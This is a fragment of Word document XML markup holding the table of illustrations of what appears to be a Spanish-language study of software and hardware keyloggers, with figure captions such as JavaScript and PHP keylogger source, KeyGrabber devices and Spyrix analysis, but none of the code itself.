        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 14. Código fuente de un keylogger en Javascript.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358153 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 15. Código fuente en PHP del backend del keylogger que registra las pulsaciones.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358154 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 16. Muestra de parte de archivo CSS para crear un keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358155 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 17. Patrones típicos de ángulos y balanceo cuando se presionan diferentes teclas de dígitos.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358156 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 18. Ejemplo de método modificado en Android SDK para crear un keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358157 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>2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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 19. Muestra de los circuitos incorporados en el keylogger KeySweeper.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358158 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3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59" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 20. Script que ejecutará el malware incrustado una vez abierto el PDF.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358159 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 21. Muestra del texto del párrafo anterior codificado en Base64.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358160 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 22. Muestra de keylogger hardware instalado en el interior de un teclado.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358161 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 23. Foto de los keyloggers hardware analizados</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358162 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 24. Vista en detalle de los dos keyloggers</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358163 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF019A" w:rsidRDefault="008400F5">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId144" w:anchor="_Toc19358164" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 27. KeyGrabber en su empaquetado original.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358164 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DF019A" w:rsidRDefault="008400F5">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId145" w:anchor="_Toc19358165" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 28. KeyGrabber conectado al teclado.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358165 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>3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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 27. Ejemplo de fichero de LOG con el contenido capturado por el keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358166 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 28. Vista del SSID activo del keylogger analizado.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358167 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 29. Pantalla de configuración del punto de acceso Wifi del keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358168 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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69" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 30. Pantalla de configuración del registro de teclas.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358169 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 31. Muestra del contenido registrado por el keylogger accedido a través de la conexión WiFi.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358170 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 32. Ejemplo de recepción de las teclas del keylogger en tiempo real mediante data streaming.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358171 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 33. Advertencia legal de Spyrix Free Keylogger</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358172 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 34. Muestra de la pantalla de monitorización web de Spyrix Free Keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358173 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 35. Muestra de registro de eventos en aplicación local de Spyrix Free Keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358174 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 36. Carpeta donde se instala Spyrix Free Keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358175 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 37. Resultado escaneo sps.exe en Virus Total.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358176 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>4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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 38. Carpetas de datos que recopila Spyrix Free Keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
